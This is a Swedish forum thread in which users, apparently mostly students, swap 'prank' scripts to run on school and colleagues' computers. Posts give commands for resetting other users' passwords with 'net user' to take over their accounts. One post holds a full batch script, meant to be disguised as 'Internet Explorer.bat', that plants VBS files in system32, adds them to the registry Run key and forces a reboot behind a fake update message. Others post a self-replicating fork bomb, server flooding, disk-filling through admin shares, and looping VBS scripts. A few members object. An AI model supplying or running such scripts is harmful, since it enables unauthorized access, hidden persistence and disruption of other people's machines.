Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Citat:

Ursprungligen inskrivet av Frigolit
du gör en URL fil genom att högerklicka på skrivbordet och välj Nytt -> Genväg
så skriver du in en URL där, då blir det en .URL fil istället för .LNK ^___^

och du kan bara göra det under någon annans namn genom att logga in på hans/hennes konto >__>

Hehe, inloggning på andras konton är inga problem så länge man har tillgång till cmd. Följande metod är dock lätt att blocka som admin men om detta inte har använts förr så är det inga problem: Skriv net users (då kommer användarna upp i en lista), net user (offrets användarnamn) password, (nya passet) sedan är det klart, man kanske måste bekräfta det nya passet men man behöver inte veta det gamla, ;). Om cmd är inaktiverad som det är på datorerna i min skola så äre bara att scripta en bat-fil. Coden är : command.com
Sedan bara att spara som (namn).bat
Den e lite fu**ad när man stänger ned den men det är inget man behöver bry sig om.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av HxMstrz4U
Hehe, inloggning på andras konton är inga problem så länge man har tillgång till cmd. Följande metod är dock lätt att blocka som admin men om detta inte har använts förr så är det inga problem: Skriv net users (då kommer användarna upp i en lista), net user (offrets användarnamn) password, (nya passet) sedan är det klart, man kanske måste bekräfta det nya passet men man behöver inte veta det gamla, ;). Om cmd är inaktiverad som det är på datorerna i min skola så äre bara att scripta en bat-fil. Coden är : command.com
Sedan bara att spara som (namn).bat
Den e lite fu**ad när man stänger ned den men det är inget man behöver bry sig om.

Hehe, ska testas på skolan så fort datorsalen är klar ^^

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Citat:

Ursprungligen inskrivet av HxMstrz4U
Hehe, inloggning på andras konton är inga problem så länge man har tillgång till cmd. Följande metod är dock lätt att blocka som admin men om detta inte har använts förr så är det inga problem: Skriv net users (då kommer användarna upp i en lista), net user (offrets användarnamn) password, (nya passet) sedan är det klart, man kanske måste bekräfta det nya passet men man behöver inte veta det gamla, ;). Om cmd är inaktiverad som det är på datorerna i min skola så äre bara att scripta en bat-fil. Coden är : command.com
Sedan bara att spara som (namn).bat
Den e lite fu**ad när man stänger ned den men det är inget man behöver bry sig om.

Försökte med det där på vår skola. Fungerade icke:/ För det första kan man inte köra cmd. inte heller batfiler. Lyckades dock slänga över det på ett usbminne och då gick det:S Meeeen, kunde inte byta. Det var rättighetsproblem:(

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk

gör som jag gjorde: lägg ett skript i autostart som öpnnar och stänger dvd-läsaren med 10 millisekunders tid (emellan stängning och öppning)
Rektorn blev lite arg när jag la skriptet på skolans server

Visa signatur

Jag tyckte att denna text räckte fint

Permalänk

När jag gick på skolan så var det primära datornätverket rätt dött men vi hade ett eget på programmet vi fick labba med rätt frick (snabba Häcka på runt 300-1000mhz) Dög ypperligt till våra program Liero och AGE2exp.

Iaf Net send funkade .. kul som fan att öppna en bat fil med några hundratals sånna där. vi sänkte ena (vi hade 3 st)serven efter några dagars krigade dessutom.

Annars så kom jag för många år sedan över ett ofarligt men grymt iritterande program. band det bakom andra progrma och ikoner och när det väl aktiverades så sprades det ner på ett gäng förvalda platser på datorn rätt svårt att ta bort då det dessutom la in sig själv varje gång på dessa plaster efter 30min.

Programmet öppnade CD läsarna med lite jämna mellan rum och stängde de. Det kunde faktist få en dator att krascha

Fast i skolan bör man plugg aoch lek kan man hålla sig till på raster eller hemma.

Tror jag hade 5 egna acc på programmets nät och åtkomst till hälften av elevernas kontotn och mappar. hade nog dessutom 3 st acc på det stora nätet Elev 123 är ju rätt lätt ^^

eller på min förra skola var Admins pass ANNA ANNA.

på typ 90 talet kunde man köra frma kör rutan och ut och göra vad man ville utan att ens logga in

Visa signatur

I am Extrazz.

Permalänk

Jag har gjort en riktigt elak men ofarlig .bat fil med hjälp av ett par vb-script som fanns i den här tråden.

:: Copies Dricka.vbs and Latmask.vbs into the registry autostart section. :: Then starts Internet explorer. :: Then tells computer to restart after 1000s. :: :: @ECHO OFF START iexplore.exe IF EXIST "C:\BATch filer\Dricka.vbs" COPY "C:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "C:\BATch filer\Dricka.vbs" GOTO 1 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :1 IF EXIST "B:\BATch filer\Dricka.vbs" COPY "B:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "B:\BATch filer\Dricka.vbs" GOTO 2 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :2 IF EXIST "D:\BATch filer\Dricka.vbs" COPY "D:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "D:\BATch filer\Dricka.vbs" GOTO 3 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :3 IF EXIST "E:\BATch filer\Dricka.vbs" COPY "E:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "E:\BATch filer\Dricka.vbs" GOTO 4 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :4 IF EXIST "F:\BATch filer\Dricka.vbs" COPY "F:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "F:\BATch filer\Dricka.vbs" GOTO 5 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :5 IF EXIST "G:\BATch filer\Dricka.vbs" COPY "G:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "G:\BATch filer\Dricka.vbs" GOTO 6 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :6 IF EXIST "H:\BATch filer\Dricka.vbs" COPY "H:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "H:\BATch filer\Dricka.vbs" GOTO 7 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :7 IF EXIST "I:\BATch filer\Dricka.vbs" COPY "I:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "I:\BATch filer\Dricka.vbs" GOTO 8 REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :8 IF EXIST "J:\BATch filer\Dricka.vbs" COPY "J:\BATch filer\Dricka.vbs" %systemroot%\system32\Dricka.vbs IF NOT EXIST "J:\BATch filer\Dricka.vbs" GOTO LEVELTWO REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Dricka /t REG_SZ /d %systemroot%\system32\Dricka.vbs GOTO LEVELTWO :LEVELTWO CLS IF EXIST "C:\BATch filer\Latmask.vbs" COPY "C:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "C:\BATch filer\Latmask.vbs" GOTO A REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :A IF EXIST "B:\BATch filer\Latmask.vbs" COPY "B:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "B:\BATch filer\Latmask.vbs" GOTO B REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :B IF EXIST "D:\BATch filer\Latmask.vbs" COPY "D:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "D:\BATch filer\Latmask.vbs" GOTO C REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :C IF EXIST "E:\BATch filer\Latmask.vbs" COPY "E:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "E:\BATch filer\Latmask.vbs" GOTO D REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :D IF EXIST "F:\BATch filer\Latmask.vbs" COPY "F:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "F:\BATch filer\Latmask.vbs" GOTO E REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :E IF EXIST "G:\BATch filer\Latmask.vbs" COPY "G:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "G:\BATch filer\Latmask.vbs" GOTO F REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :F IF EXIST "H:\BATch filer\Latmask.vbs" COPY "H:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "H:\BATch filer\Latmask.vbs" GOTO G REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :G IF EXIST "I:\BATch filer\Latmask.vbs" COPY "I:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "I:\BATch filer\Latmask.vbs" GOTO H REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :H IF EXIST "J:\BATch filer\Latmask.vbs" COPY "J:\BATch filer\Latmask.vbs" %systemroot%\system32\Latmask.vbs IF NOT EXIST "J:\BATch filer\Latmask.vbs" GOTO LEVELTHREE REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Latmask /t REG_SZ /d %systemroot%\system32\Latmask.vbs GOTO LEVELTHREE :LEVELTHREE CLS SHUTDOWN -r -t 30 -f -c "A major Windows update is being finalized and Windows must reboot due to some technical limitations in The Operating System. Close all your open programs and wait; this may take a while." EXIT

Dricka.vbs är filen som öppnar och stänger cd-läsaren.
Latmask.vbs är filen som det står något om chips i och som bara kommer upp igen.
Det är smart att döpa filen till t ex "Internet Explorer.bat"
Det den gör är att först starta Internet Explorer, sedan kopierar den "Latmask.vbs" och "Dricka.vbs" till system32 mappen. Därefter lägger den in dem i autostart (i registret).
Sedan startar den om datorn efter 30s. När den startar väntar en otrevlig upplevelse.
Kom bara ihåg att köra den som administratör.
Anledningen till att det är så många olika :a, :b, osv. är att man ibland har filen på ett USB-minne som får olika enhetsbetäckning på olika datorer beroende på hur många hårddiskar man har. När man sedan har kört scriptet så drar man ut USB-minnet och sticker (eller något).
Sökvägar och dylikt får ni klart ändra själva beroende på hur ni vill ha det.

/Calle

Permalänk
Medlem

Är det bara jag som tycker det är barnsligt och rent ut sagt fel att göra såna här taskiga saker mot oskyldigt folk? (Jag syftar inte på kompisar som skämtar mellan varandra).

Misstänker att många virusmakare och liknande började i de här banorna. Väx upp för tusan. Små, till synes oskydliga "bus" kan ställa till mer än vad ni kanske tror.

Permalänk
Medlem

[QUOTE]Ursprungligen inskrivet av sven_melas
[B]på skolan brukar vi skicka shutdown -a [IP] till varandra på lektioner

berätta mer!, äre cmd/ shutdown -a 192.000.0.00 eller ?

Visa signatur

OLD FASIONSHOW...
Gigabyte GA-MA790X-UD3P. AMD Phenom black edition 3.4Ghz,Corsair 2 GB 800MHZ, Asus 3870 512MB DDR4 851MHz/1143MEM, 2,7 TB. HD 4,7TB och en ful jävla burk!

Permalänk
Medlem

Något som är väldigt roligt är att (om det nu går via ett commando vet jag inte) byta ut ljud på IM program, tex vid vibbar på msn, ha en tjej som stönar som vid orgasm. Väldigt skoj.

Även ta en printscreen på hans skrivbord, för att sedan plocka bort alla genvägar som han har på skrivbordet, och se hur han reagerar när han försöker klicka på en "ikon" som inte finns. Priceless

Permalänk

skriv shutdown -i så kommer Avsluta fjärrdator upp.

Bat: lol.bat

start lol.bat

liten och effektiv.

sen finns det ett program som heter Bat2Exe-Converter som kan vara ganska bra att ha ibland. Länk

Permalänk

Gjorde precis ett litet program och la in på en kollegas dator som en gång i timmen laddade hem en slumpvis utvald bild på Bert Karlsson och la som bakgrundsbild:)

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem

Populär tråd. Det är uppenbarligen kul att sabba för andra? Eller talar vi mest om teoretiska bus här?

jimih> Nej, jag håller med dig och sällar mig nog till skaran tråkmånsar. Exempel:

Häromdagen pajade min jobbdator. Det tog en hel dag innan jag var tillbaka och kunde jobba effektivt. Bara i uteblivna intäkter går det att räkna pengar om man vill. Sen har vi allt arbete som inte blev gjort den dagen och följaktligen rendrerade merjobb och stress för att det inte blev gjort.

Om jag fick reda på att något sådant skett pga att nån klåfingring nörd-wannabe ville testa sitt script och få sig ett gott skratt...hurr... Och varför skulle min tid egentligen vara viktigare än en skolelevs som sitter och gör ett arbete som skall lämnas in.... sak samma. Och mamma/pappa/syrran sitter nog inte bara vid hemdatorn och surfar - det händer väl också att räkningar betalas och andra saker av viss.. vikt görs.

För att inte tala om kostnaden att försöka driva en datorpark där användarna aktivt försöker sabba utrustningen. Datorer och program slutar fungera så bra utan att man hjälper dem och det kostar skitmycket pengar att fixa.

Vad jag försöker säga är, kul eller inte, oskyldigt eller inte - använd sunt förnuft och sabba inte för nån åtminstone... Det är en jädra skillnad att brutalt stänga ned ett fönster eller en dator mot att visa Bert Karlsson. Men oavsett lär det ta tid i anspråk för någon pga det...

Visa signatur

Crap.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av KurreKula
Gjorde precis ett litet program och la in på en kollegas dator som en gång i timmen laddade hem en slumpvis utvald bild på Bert Karlsson och la som bakgrundsbild:)

Det är ju sådant som är roligt

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Citat:

Ursprungligen inskrivet av Ala_95
Det är ju sådant som är roligt

Riktigt roligt, skrattade så jag dog! Sen gjorde jag så att intervallet halverades varje gång också.. Så det var 60, 30, 15, 7.5 etc etc, till slut pepprade den bara fram nya bilder

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av KurreKula
Riktigt roligt, skrattade så jag dog! Sen gjorde jag så att intervallet halverades varje gång också.. Så det var 60, 30, 15, 7.5 etc etc, till slut pepprade den bara fram nya bilder

Haha. Vad sade din kollega då?

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Citat:

Ursprungligen inskrivet av Ala_95
Haha. Vad sade din kollega då?

Han försökte ta bort det, men han visste ju hela tiden att det var jag Hjälpte honom att ta bort när det blev värre ;D Han skrattade efter också

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem

Har ni något tips på program eller kommando som är jobbigt, men inte skadar datorn?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av N00bAbbe
Har ni något tips på program eller kommando som är jobbigt, men inte skadar datorn?

Läs igenom tråden du just skrev i vetja

Visa signatur

Kom-pa-TI-bilitet

Permalänk
Medlem

Jag har läst igenom den, men funkar allt till XP och Vista?

Har ni något tips på ett enkelt kommando som fuckar datorn?

Permalänk
Arvid Nordqvist-mannen
Citat:

Ursprungligen inskrivet av N00bAbbe
Jag har läst igenom den, men funkar allt till XP och Vista?

Har ni något tips på ett enkelt kommando som fuckar datorn?

Men läs genom tråden, det är ju 27 sidor med hyss:)

Skit i os...

Permalänk
Medlem

Har läst några sidor:P Verkar ju skitkul! Måste läsa mer sen som fan:P

Visa signatur

Tack till SAiKoU för avataren!
Stationär: i5-8400 | MSI Z370-A PRO | 24 GB DDR4 | 850EVO 500GB | Corsair VX450 | 1060 6GB Windforce

Permalänk
Medlem

Kan jag på något sätt ta mig in på en kompis dator om vi sitter på samma nätverket. Tänker på datasalen på skolan, vore roligt att "hacka" sig in på en kompis dator som han sitter vid och sedan ha lite roligt, går det?

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Ala_95
Kan jag på något sätt ta mig in på en kompis dator om vi sitter på samma nätverket. Tänker på datasalen på skolan, vore roligt att "hacka" sig in på en kompis dator som han sitter vid och sedan ha lite roligt, går det?

Lite sent ute kanske men du kan ju alltid prova med admin shares och sen fylla hans C:, det är lite festligt.

Kör hans IP och lägg till \c$

Kör: \\kompisdatorsIPellernamn\c$

Visa signatur

4690k 1.25V 4.8 ghz |16 gb Corsair Plat|Slitmoddat 780TI 1250 mhz|Z97x SOC force|Seasonic plat 750W|Evo 850 250 gb.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Ovard
Lite sent ute kanske men du kan ju alltid prova med admin shares och sen fylla hans C:, det är lite festligt.

Kör hans IP och lägg till \c$

Kör: \\kompisdatorsIPellernamn\c$

Humm... Vet nog inte exakta datornamnet eller IP, men vet namnet på hans inloggning. Vad händer om jag "fyller hans C:"?

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Ala_95
Humm... Vet nog inte exakta datornamnet eller IP, men vet namnet på hans inloggning. Vad händer om jag "fyller hans C:"?

Jag vet att man med CMD kan se vem som är inloggad på vilken dator men jag orkar faktiskt inte googla just nu, men det går.

Om det är en skoldator så har ni säkerligen rätt dåliga diskar i datorerna och således kommer datorn gå bra långsamt om det inte finns rätt mycket RAM i burken. Om inte annat så kan program krascha om HDD'n fylls för snabbt, och sen är det ju rätt kul att skapa en fil som heter "SYSDUMP.JAGÄRHEMSKTVIKTIG" och är 45 GB stor rakt på C: Det går också att göra i CMD, googla är din vän.

Självklart kan du döpa filen till vad du vill.

Visa signatur

4690k 1.25V 4.8 ghz |16 gb Corsair Plat|Slitmoddat 780TI 1250 mhz|Z97x SOC force|Seasonic plat 750W|Evo 850 250 gb.

Permalänk
Medlem

Processorn är en E6700 har jag för mig. 1gb ram-mine (lite av någon anledning). Hårddisken har jag ingen koll på men antar att den är lite då allting sparas på en server i nätverket.

Går det inte att skicka ett "virus" eller något som typ öppnar notepad varje minut eller så.

Skulle väl kunna göra en bat-fil med ett sådant kommando, men tanken är att han inte ska märka att vi har gjort något med hans dator. Alltså, han ska tänka "Varför f*n startas notepad varje minut!?". Har vi varit och pillat på hans dator så vet han ju vilka som ligger bakom -.-

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Medlem

det blir nog svårt att få notepad att startas utan att pilla på hans dator...

set wshshell = wscript.createobject("wscript.shell")
do
wscript.sleep 60000
wshshell.run "notepad.exe"
loop

startar notepad varje minut. spara som *.vbs

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av 22223
det blir nog svårt att få notepad att startas utan att pilla på hans dator...

set wshshell = wscript.createobject("wscript.shell")
do
wscript.sleep 60000
wshshell.run "notepad.exe"
loop

startar notepad varje minut. spara som *.vbs

Tackar, ska använda det nästa gång
Kan man göra en delay så att den starta första gången om 10 minutes. Sen är det varje minut.

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk
Citat:

Ursprungligen inskrivet av Ala_95
Tackar, ska använda det nästa gång
Kan man göra en delay så att den starta första gången om 10 minutes. Sen är det varje minut.

Tänk lite nu;)

wscript.sleep 600000 set wshshell = wscript.createobject("wscript.shell") do wscript.sleep 60000 wshshell.run "notepad.exe" loop

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem

set wshshell = wscript.createobject("wscript.shell") dim div,i,x x = 4 + i div = 600000 for i=1 to x wscript.sleep div wshshell.run "notepad.exe" div = div /2 x = 4 * i * 1000 next

Börjar med ett tio minuters delay, sen delas delayet hela tiden med två.
så det blir tio, fem, två och en halv osv. till slut kommer det upp massor av notepad ^^